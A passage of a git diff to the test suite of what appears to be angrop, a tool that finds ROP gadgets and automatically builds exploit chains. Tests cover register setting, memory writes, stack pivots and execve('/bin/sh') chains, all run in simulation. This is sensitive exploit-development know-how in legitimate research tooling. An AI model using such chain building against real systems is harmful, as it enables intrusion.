b/gifs/kernel.gif new file mode 100644 index 00000000..ae7a449c Binary files /dev/null and b/gifs/kernel.gif differ diff --git a/pyproject.toml b/pyproject.toml index 890c3fc5..fed528d4 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,4 +1,3 @@ [build-system] requires = ["setuptools"] build-backend = "setuptools.build_meta" - diff --git a/tests/test_chainbuilder.py b/tests/test_chainbuilder.py index 6000fe1c..26975e70 100644 --- a/tests/test_chainbuilder.py +++ b/tests/test_chainbuilder.py @@ -5,6 +5,7 @@ import angr import angrop # pylint: disable=unused-import from angrop.rop_value import RopValue +from angrop.rop_block import RopBlock from angrop.errors import RopException BIN_DIR = os.path.join(os.path.dirname(__file__), "..", "..", "binaries") @@ -16,7 +17,7 @@ def test_symbolic_data(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -107,7 +108,7 @@ def test_x86_64_syscall(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -150,7 +151,7 @@ def test_i386_mem_write(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -167,7 +168,7 @@ def test_ropvalue(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -215,7 +216,7 @@ def test_set_regs(): proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -231,7 +232,7 @@ def test_add_to_mem(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -249,9 +250,9 @@ def test_add_to_mem(): cache_path = os.path.join(CACHE_DIR, "armel_glibc_2.31") proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) - rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True, cond_br=False) if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -263,7 +264,7 @@ def test_add_to_mem(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -276,7 +277,7 @@ def test_pivot(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -297,7 +298,7 @@ def test_shifter(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -323,7 +324,7 @@ def test_shifter(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -338,7 +339,7 @@ def test_shifter(): proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -354,7 +355,7 @@ def test_shifter(): rop = proj.analyses.ROP(fast_mode=True, only_check_near_rets=False) if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -371,7 +372,7 @@ def test_retsled(): rop = proj.analyses.ROP() if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -398,7 +399,7 @@ def test_retsled(): proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) if os.path.exists(cache_path): - rop.load_gadgets(cache_path) + rop.load_gadgets(cache_path, optimize=False) else: rop.find_gadgets() rop.save_gadgets(cache_path) @@ -505,8 +506,15 @@ def test_aarch64_cond_branch(): load_address=0x400000, auto_load_libs=False, ) - rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, cond_br=True) rop.find_gadgets_single_threaded(show_progress=False) + addrs = [x.addr for x in rop._all_gadgets] + + assert addrs.count(0x40000c) == 2 + assert addrs.count(0x400010) == 2 + assert 0x400008 in addrs or 0x400020 in addrs + assert any(x in addrs for x in (0x400004, 0x40001c)) + chain = rop.set_regs(x2=0x41414141) state = chain.exec() assert state.regs.x2.concrete_value == 0x41414141 @@ -530,8 +538,7 @@ def test_aarch64_mem_access(): assert state.regs.x0.concrete_value == 0x41414141 for action in state.history.actions: if action.type == action.MEM and action.action == action.WRITE: - assert action.addr.ast.concrete_value >= 0x1000 - assert action.addr.ast.concrete_value < 0x2000 + assert 0x400000 <= action.addr.ast.concrete_value < 0x401000 def test_mipstake(): proj = angr.Project(os.path.join(BIN_DIR, "tests", "mips", "mipstake"), auto_load_libs=True, arch="mips") @@ -585,6 +592,547 @@ def test_unexploitable(): assert state.regs.rsi.concrete_value == 0x4242424242424242 assert state.regs.rdx.concrete_value == 0x4343434343434343 +def test_graph_search_reg_setter(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "arjsfxjr"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False) + cache_path = os.path.join(CACHE_DIR, "arjsfxjr") + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path) + else: + rop.find_gadgets() + rop.save_gadgets(cache_path) + + # the easy peasy pop-only reg setter + chain = rop.set_regs(r15=0x41414141) + assert chain + + # the ability to utilize concrete values + # 0x000000000040259e : xor eax, eax ; add rsp, 8 ; ret + chain = rop.set_regs(rax=0) + assert chain + + # the ability to set a register and then move it to another + chain = rop.set_regs(rax=0x41414141) + assert chain + state = chain.exec() + assert state.regs.rax.concrete_value == 0x41414141 + + # the ability to write_to_mem + chain = rop.write_to_mem(0x41414141, b'BBBB') + assert chain + state = chain.exec() + assert state.solver.eval(state.memory.load(0x41414141, 4), cast_to=bytes) == b'BBBB' + + # the ability to write_to_mem and utilize jmp_mem gadgets + chain = rop.func_call(0xdeadbeef, [0x41414141, 0x42424242, 0x43434343]) + state = chain.concrete_exec_til_addr(0xdeadbeef) + assert state.regs.rdi.concrete_value == 0x41414141 + assert state.regs.rsi.concrete_value == 0x42424242 + assert state.regs.rdx.concrete_value == 0x43434343 + assert state.ip.concrete_value == 0xdeadbeef + +def test_rebalance_ast(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP() + + rop.analyze_gadget(0x512ecf) # pop rcx; ret + rop.analyze_gadget(0x533e24) # mov eax, dword ptr [rsp]; add rsp, 0x10; pop rbx; ret + + chain = rop.set_regs(rax=0x41414142, rbx=0x42424243, rcx=0x43434344) + state = chain.exec() + assert state.regs.rax.concrete_value == 0x41414142 + assert state.regs.rbx.concrete_value == 0x42424243 + assert state.regs.rcx.concrete_value == 0x43434344 + +def test_normalize_call(): + proj = angr.load_shellcode( + """ + pop rsi + ret + mov edx, ebx + mov r8, rax + call rsi + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + chain = rop.move_regs(r8="rax") + assert chain + + proj = angr.load_shellcode( + """ + pop rax + ret + lea rsp, [rsp + 8] + ret + add eax, 0x2f484c7 + mov rdx, r12 + mov r8, rbx + call rax + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + try: + chain = rop.move_regs(r8="rax") + assert chain is None + except RopException: + pass + +def test_normalize_jmp_mem(): + proj = angr.load_shellcode( + """ + pop rbx + pop r10 + call qword ptr [rbp + 0x48] + pop rbp + ret + pop rax + pop rbx + ret + mov qword ptr [rbx], rax; + ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(r10=0x41414141) + state = chain.exec() + assert state.regs.r10.concrete_value == 0x41414141 + + proj = angr.load_shellcode( + """ + pop r9 + pop rbp + call qword ptr [rbp + 0x48] + pop rbp + ret + pop rax + pop rbx + ret + mov qword ptr [rbx], rax; + ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(r9=0x41414141) + state = chain.exec() + assert state.regs.r9.concrete_value == 0x41414141 + +def test_jmp_mem_normalize_simple_target(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) + rop.analyze_gadget(0x004a9d67) + rop.analyze_gadget(0x004cbbb7) + rop.analyze_gadget(0x004c1317) + rop.chain_builder.optimize() + chain = rop.move_regs(r5="r1") + assert chain + +def test_normalize_conditional(): + proj = angr.load_shellcode( + """ + pop rbp + ret + cmp ebp, esp + pop rax + pop rdx + jne 0x4072a8 + pop rbx + pop rbp + pop r12 + ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + +def test_normalize_moves_in_reg_setter(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", + "ALLSTAR_android-libzipfile-dev_liblog.so.0.21.0"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x0000000000403765) # pop rax; ret + rop.analyze_gadget(0x000000000040236e) # pop rsi; ret + rop.analyze_gadget(0x0000000000401a50) # pop rbp ; ret + rop.analyze_gadget(0x0000000000404149) # mov dword ptr [rsi + 0x30], eax; xor eax, eax; pop rbx; ret + rop.analyze_gadget(0x0000000000402d7a) # mov edx, ebp; mov rsi, r12; mov edi, r13d; + # call 0x401790; jmp qword ptr [rip + 0x2058ca] + rop.chain_builder.optimize() + + chain = rop.set_regs(rdx=0x41414141) + assert chain is not None + +def test_normalize_oop_jmp_mem(): + proj = angr.load_shellcode( + """ + mov rax, qword ptr [rsp + 8]; mov edx, ebp; mov esi, ebx; mov rdi, rax; call qword ptr [rax + 0x68] + pop rdi; + ret + pop rsi; + ret + mov qword ptr[rdi], rsi; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + +def test_normalize_symbolic_access(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "ALLSTAR_alex_alex"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x0000000000594254) # : pop r9 ; add byte ptr [rax - 9], cl ; ret + rop.analyze_gadget(0x000000000040fb98) # : pop rax ; ret + rop.chain_builder.optimize() + rop.set_regs(r9=0x41414141) + +def test_riscv(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "server_eapp.eapp_riscv"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False) + cache_path = os.path.join(CACHE_DIR, "riscv_server_eapp") + if os.path.exists(cache_path): + rop.load_gadgets(cache_path, optimize=False) + else: + rop.find_gadgets(optimize=False) + rop.save_gadgets(cache_path) + + rop.optimize() + chain = rop.set_regs(a0=0x41414141, a1=0x42424242) + state = chain.exec() + assert state.regs.a0.concrete_value == 0x41414141 + assert state.regs.a1.concrete_value == 0x42424242 + +def test_nested_optimization(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "abgate-libabGateQt.so"), + load_options={'main_opts':{'base_addr': 0}}, + ) + rop = proj.analyses.ROP(fast_mode=False, cond_br=True, max_bb_cnt=5) + + rop.analyze_addr(0x5f7a) + rop.analyze_addr(0x77b0) + rop.analyze_addr(0x77da) + rop.analyze_addr(0x775e) + + rop.chain_builder.optimize() + + chain = rop.func_call(0xdeadbeef, [0x40404040, 0x41414141, 0x42424242], needs_return=False) + + assert chain is not None + +def test_normalize_jmp_reg(): + proj = angr.load_shellcode( + """ + pop rax; ret + mov rax, rdi; pop rbx; ret + mov eax, ebx; pop rbx; ret + pop rbx; ret + add rsp, 8; ret + mov edx, eax; mov esi, 1; call rbx + pop rdi; ret + mov dword ptr [rdx], edi; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + rop.write_to_mem(0x41414141, b'BBBB') + +def test_normalize_oop_jmp_reg(): + proj = angr.load_shellcode( + """ + pop rdi; ret + mov rax, rdi; ret + pop rbx; ret + add rsp, 8; ret + add rsp, 0x18; ret + mov rdx, rax; mov rdi, qword ptr [rsp + 8]; call rbx + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + chain = rop.set_regs(rax=0x3b, rdi=0x41414141, rdx=0) + assert chain is not None + +def test_double_ropblock(): + proj = angr.load_shellcode( + """ + pop rax; mov byte ptr [rbx], 1; ret + mov rdi, rax; ret + pop rbx; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + chain = rop.set_regs(rax=0x3b, rdi=0x41414141) + assert chain is not None + +def test_maximum_write_gadget(): + proj = angr.load_shellcode( + """ + pop rax; ret + pop rdi; ret + mov qword ptr [rax], rdi; add rsp, 0x3d8; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, stack_gsize=200) + rop.find_gadgets_single_threaded(show_progress=False) + rop.write_to_mem(0x41414141, b'BBBB') + +def test_normalize_jmp_mem_with_pop(): + proj = angr.load_shellcode( + """ + pop rax; pop rbx; ret + pop rdi; ret + pop r12; ret + pop r13; ret + pop rsi; ret + mov qword ptr [rax], rdi; ret + mov rdx, r13; mov rsi, r14; mov edi, r15d; call qword ptr [r12 + rbx*8] + syscall + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, stack_gsize=200) + rop.find_gadgets_single_threaded(show_progress=False) + chain = rop.execve() + assert chain is not None + +def test_sim_exec_memory_write(): + proj = angr.load_shellcode( + """ + pop rax; + ret; + pop rbx; + mov qword ptr [rax+0x10], 0x41414141 + ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(rbx=1) + state = chain.exec() + addr = None + for act in state.history.actions: + if act.type != 'mem': + continue + if not act.data.ast.symbolic and act.data.ast.concrete_value == 0x41414141: + assert not act.addr.ast.symbolic + addr = act.addr.ast.concrete_value + + rb = RopBlock.from_chain(chain) + _, state = rb.sim_exec() + assert state.solver.eval(state.memory.load(addr, 4)) == 0x41414141 + +def local_conflict_address(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "ALLSTAR_9base_dd"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP() + + rop.find_gadgets(processes=16) + + chain = rop.execve() + chain.pp() + state = chain.sim_exec_til_syscall() + data = state.solver.eval(state.memory.load(state.regs.rdi, 8), cast_to=bytes) + assert data == b'/bin/sh\x00' + + assert len(chain._values) <= 23 + +def test_normalize_jmp_mem_with_oop_access(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "ALLSTAR_aces3_xaces3"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + + rop.analyze_gadget(0x0000000000a42cc2) + rop.analyze_gadget(0x0000000000a28b7e) + rop.analyze_gadget(0x00000000004ff8aa) + rop.analyze_gadget(0x00000000004ff46a) + rop.analyze_gadget(0x00000000004e91f7) + rop.analyze_gadget(0x000000000043b2fa) # : add rsp, 0x18 ; ret + + rop.optimize() + + chain = rop.set_regs(r10=0x41414141) + assert chain is not None + +def test_mem_write_with_stack_controller(): + proj = angr.load_shellcode( + """ + pop r8; mov qword ptr [r8 + 0x10], rax; ret + pop rax; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.write_to_mem(0x41424344, b'BBBB') + assert chain is not None + +def test_partial_pop(): + for _ in range(10): + proj = angr.load_shellcode( + """ + pop rcx; mov eax, ecx; ret + pop rax; ret + mov rbx, rax; ret + mov ebx, eax; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x400000) + rop.find_gadgets_single_threaded(show_progress=False) + + value = RopValue(0x4141414141414141, proj) + chains = list(rop.chain_builder._reg_setter.find_candidate_chains_giga_graph_search(None, + {'rbx': value}, + {}, + False)) + assert chains + + chain = rop.set_regs(rbx=0x4141414141414141) + assert chain is not None + +def test_mem_write_with_cache(): + proj = angr.load_shellcode( + """ + mov dword ptr [rax+0x10], ebx; ret + pop rax; ret + pop rbx; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x400000) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.write_to_mem(0x41414141, b'BBBB') + assert chain is not None + +def test_reg_setting_equal_set(): + proj = angr.load_shellcode( + """ + pop rdi; ret + lea rax, [rdi + 2]; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x400000) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(rax=0x41414141, rdi=0x42424242) + assert chain is not None + +def test_short_write(): + proj = angr.load_shellcode( + """ + mov ecx, 0x480021c6; cwde ; mov qword ptr [rdx + rcx*8 - 8], rax; add rsp, 8; ret + pop rax; ret + pop rdx; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.write_to_mem(0x41414141, b'BBBB') + assert chain is not None + +def test_pop_write(): + proj = angr.load_shellcode( + """ + push rax; pop qword ptr [rcx]; ret + pop rax; ret + pop rcx; ret + """, + "amd64", + simos='linux', + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.write_to_mem(0x41414141, b'BBBB') + assert chain is not None + +def test_riscv_oop_normalization(): + cache_path = os.path.join(CACHE_DIR, "riscv_asterisk-libasteriskpj.so.2") + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "asterisk-libasteriskpj.so.2"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path, optimize=False) + else: + rop.find_gadgets(processes=16, optimize=False) + rop.save_gadgets(cache_path) + + g = rop.analyze_gadget(0x00000000000407cc) + rb = rop.chain_builder._reg_setter.normalize_gadget(g) + assert rb is not None + + g = rop.analyze_gadget(0x000000000007cc66) + rb = rop.chain_builder._reg_setter.normalize_gadget(g) + assert rb is not None + def run_all(): functions = globals() all_functions = {x:y for x, y in functions.items() if x.startswith('test_')} @@ -592,6 +1140,8 @@ def run_all(): if hasattr(all_functions[f], '__call__'): print(f) all_functions[f]() + print("local_conflict_address") + local_conflict_address() if __name__ == "__main__": import sys diff --git a/tests/test_find_gadgets.py b/tests/test_find_gadgets.py index a7e00fc1..cdb0392c 100644 --- a/tests/test_find_gadgets.py +++ b/tests/test_find_gadgets.py @@ -1,5 +1,6 @@ import os import logging +from io import BytesIO import angr import angrop # pylint: disable=unused-import @@ -37,7 +38,7 @@ def local_multiprocess_find_gadgets(): proj = angr.Project(os.path.join(tests_dir, "i386", "bronze_ropchain"), auto_load_libs=False) rop = proj.analyses.ROP() - rop.find_gadgets(show_progress=False) + rop.find_gadgets(show_progress=True) assert all(gadget_exists(rop, x) for x in [0x080a9773, 0x08091cf5, 0x08092d80, 0x080920d3]) @@ -174,16 +175,6 @@ def test_i386_syscall(): """ assert all(not gadget_exists(rop, x) for x in [0x8049189]) -def test_gadget_timeout(): - # pylint: disable=pointless-string-statement - proj = angr.Project(os.path.join(tests_dir, "x86_64", "datadep_test"), auto_load_libs=False) - rop = proj.analyses.ROP() - """ - 0x4005d5 ret 0xc148 - """ - gadget = rop.analyze_gadget(0x4005d5) - assert gadget - def local_multiprocess_analyze_gadget_list(): # pylint: disable=pointless-string-statement proj = angr.Project(os.path.join(tests_dir, "x86_64", "datadep_test"), auto_load_libs=False) @@ -203,7 +194,8 @@ def test_gadget_filtering(): rop.analyze_gadget(0x42bca5) rop.analyze_gadget(0x42c3c1) rop.chain_builder.bootstrap() - assert len(rop.chain_builder._reg_setter._reg_setting_gadgets) == 1 + values = list(rop.chain_builder._shifter.shift_gadgets.values()) + assert len(values) == 1 and len(values[0]) == 1 def test_aarch64_svc(): proj = angr.Project(os.path.join(tests_dir, "aarch64", "libc.so.6"), auto_load_libs=False) @@ -226,12 +218,12 @@ def test_enter(): def test_jmp_mem_gadget(): proj = angr.Project(os.path.join(tests_dir, "x86_64", "libc.so.6"), auto_load_libs=False) rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) - # 0x0000000000031f6d : jmp qword ptr [rax] - # 0x000000000004bec2 : call qword ptr [r11 + rax*8] - g = rop.analyze_gadget(0x0000000000431f6d) + # 0x00000000001a2bd9 : xchg edx, esi ; jmp qword ptr [rax] + # 0x00000000001905a1 : xor ebp, edx ; call qword ptr [rdx] + g = rop.analyze_gadget(0x5a2bd9) assert g is not None assert g.transit_type == 'jmp_mem' - g = rop.analyze_gadget(0x000000000044bec2) + g = rop.analyze_gadget(0x5905a1) assert g is not None assert g.transit_type == 'jmp_mem' @@ -252,14 +244,122 @@ def test_syscall_next_block(): chain = rop.do_syscall(2, [1, 0x41414141, 0x42424242, 0], preserve_regs={'eax'}, needs_return=True) assert chain +def test_rex_pop_r10(): + f = BytesIO() + f.write(b"OZ\xc3") + proj = angr.Project( + BytesIO(b"OZ\xc3"), + main_opts={ + "backend": "blob", + "arch": "amd64", + "entry_point": 0, + "base_addr": 0, + }) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + g = rop.analyze_gadget(0) + assert g is not None + +def test_max_stack_change(): + proj = angr.load_shellcode(""" + xchg ebp, eax + ret 0xd020 + """, + "amd64", + ) + + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + g = rop.analyze_gadget(0) + assert g is None + +def test_symbolized_got(): + proj = angr.Project(os.path.join(tests_dir, "x86_64", "ALLSTAR_acct_sa"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + g = rop.analyze_gadget(0x40156A) + assert g is not None + + # this will be considered pop, but it is not pop + # pop rax; add al, 0; add al, al; ret + g = rop.analyze_gadget(0x406850) + assert g is None or 'rax' not in g.popped_regs + +def test_syscall_when_ret_only(): + proj = angr.load_shellcode( + """ + syscall + """, + "amd64", + load_address=0x400000, + simos='linux', + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=True) + rop.find_gadgets_single_threaded(show_progress=False) + assert rop._all_gadgets + +def test_riscv(): + proj = angr.Project(os.path.join(tests_dir, "riscv", "server_eapp.eapp_riscv"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False) + g = rop.analyze_gadget(0xA86C) + assert g is not None + + proj = angr.Project(os.path.join(tests_dir, "riscv", "abgate-libabGateQt.so"), + load_options={'main_opts':{'base_addr': 0}}, + ) + rop = proj.analyses.ROP(fast_mode=False, cond_br=True, max_bb_cnt=5) + g = rop.analyze_addr(0x77da) + assert g + +def test_jmp_mem_num_mem_access(): + proj = angr.load_shellcode( + """ + mov edx, ebp; + mov rsi, r14; + mov edi, r15d; + call qword ptr [r12 + rbx*8] + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + g = rop.analyze_gadget(0x400000) + assert g is not None + +def test_exit_target(): + proj = angr.load_shellcode( + """ + mov eax, dword ptr [rsp]; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + g = rop.analyze_gadget(0x400000) + assert not g.popped_regs + +def test_syscall_block_hash(): + proj = angr.Project(os.path.join(tests_dir, "x86_64", "ALLSTAR_apcalc-dev_sample_many"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + # the following line is necessary because it populates syscall_locations + rop.gadget_finder.gadget_analyzer # pylint: disable=pointless-statement + tasks = list(rop.gadget_finder._addresses_to_check_with_caching(show_progress=False)) + for addr in [0x402de7, 0x425a00, 0x43e083, 0x4b146c]: + assert addr in tasks + def run_all(): functions = globals() all_functions = {x:y for x, y in functions.items() if x.startswith('test_')} for f in sorted(all_functions.keys()): + print(f) if hasattr(all_functions[f], '__call__'): all_functions[f]() - local_multiprocess_find_gadgets() + print("local_multiprocess_analyze_gadget_list") local_multiprocess_analyze_gadget_list() + print("local_multiprocess_find_gadgets") + local_multiprocess_find_gadgets() if __name__ == "__main__": logging.getLogger("angrop.rop").setLevel(logging.DEBUG) diff --git a/tests/test_gadgets.py b/tests/test_gadgets.py index edfcb99e..6755eaf3 100644 --- a/tests/test_gadgets.py +++ b/tests/test_gadgets.py @@ -48,7 +48,7 @@ def test_arm_mem_change_gadget(): # pylint: disable=pointless-string-statement proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) - rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True, max_sym_mem_access=4) """ 0x0004f08c <+28>: ldr r2, [r4, #48] ; 0x30 @@ -91,7 +91,7 @@ def test_arm_mem_change_gadget(): 4c1eaa bx lr """ gadget = rop.analyze_gadget(0x4c1ea4+1) # thumb mode - assert not gadget.mem_changes + assert gadget.mem_changes """ 4c1e8e ldr r1, [r4,#0x14] @@ -115,10 +115,14 @@ def test_pivot_gadget(): """ gadget = rop.analyze_gadget(0x5719da) assert gadget.stack_change == 0x4 + assert gadget.stack_change_before_pivot == 0x4 assert gadget.stack_change_after_pivot == 0x4 assert len(gadget.sp_controllers) == 1 assert len(gadget.sp_reg_controllers) == 0 + chain = rop.pivot(0x600000) + assert chain + proj = angr.Project(os.path.join(BIN_DIR, "tests", "i386", "bronze_ropchain"), auto_load_libs=False) rop = proj.analyses.ROP() @@ -129,6 +133,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x80488e8) assert type(gadget) == PivotGadget assert gadget.stack_change == 0 + assert gadget.stack_change_before_pivot == 0 assert gadget.stack_change_after_pivot == 0x8 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop() == 'ebp' @@ -150,6 +155,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x8048998) assert type(gadget) == PivotGadget assert gadget.stack_change == 0xc + assert gadget.stack_change_before_pivot == 0xc assert gadget.stack_change_after_pivot == 0x4 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop().startswith('symbolic_stack_') @@ -160,6 +166,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x8048fd6) assert type(gadget) == PivotGadget assert gadget.stack_change == 0 + assert gadget.stack_change_before_pivot == 0 assert gadget.stack_change_after_pivot == 0x4 assert 